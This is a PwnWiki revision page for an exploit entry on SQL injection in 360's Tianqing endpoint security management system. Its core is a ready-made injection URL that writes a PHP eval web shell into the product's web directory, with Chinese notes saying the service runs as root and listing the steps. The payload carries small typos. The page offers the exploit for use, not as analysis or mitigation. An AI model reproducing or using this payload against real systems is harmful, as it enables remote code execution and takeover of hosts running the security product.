Difference between revisions of "終端安全管理系統(天擎)前端SQL注入漏洞"
From PwnWiki
(Created page with "<languages /> ==EXP== <pre> https://127.0.0.1:8843/api/dp/rptsvcsyncpoint?ccid=1';create table O(TEXT);insert into O(T) values('<>php @eval($_POST[1];?>)');copy O(T) to 'C"\P...") |
(Marked this version for translation) |
||
| Line 6: | Line 6: | ||
<translate> | <translate> | ||
| − | ==漏洞信息== | + | ==漏洞信息== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
1.通過安裝包安裝的程序一般擁有ROOT權限,因此該注入點可嘗試寫入Shell | 1.通過安裝包安裝的程序一般擁有ROOT權限,因此該注入點可嘗試寫入Shell | ||
| + | <!--T:3--> | ||
2.通過注入點,創建一張表 <code>O</code> | 2.通過注入點,創建一張表 <code>O</code> | ||
| + | <!--T:4--> | ||
3.爲表<code>O</code>添加一個新字段<code>T</code>並且寫入Shell內容 | 3.爲表<code>O</code>添加一個新字段<code>T</code>並且寫入Shell內容 | ||
</translate> | </translate> | ||
Latest revision as of 12:28, 8 April 2021
EXP
https://127.0.0.1:8843/api/dp/rptsvcsyncpoint?ccid=1';create table O(TEXT);insert into O(T) values('<>php @eval($_POST[1];?>)');copy O(T) to 'C"\Program Files(x86)\360\skylar6\www\1.php';drop table O;--
漏洞信息
1.通過安裝包安裝的程序一般擁有ROOT權限,因此該注入點可嘗試寫入Shell
2.通過注入點,創建一張表 O
3.爲表O添加一個新字段T並且寫入Shell內容
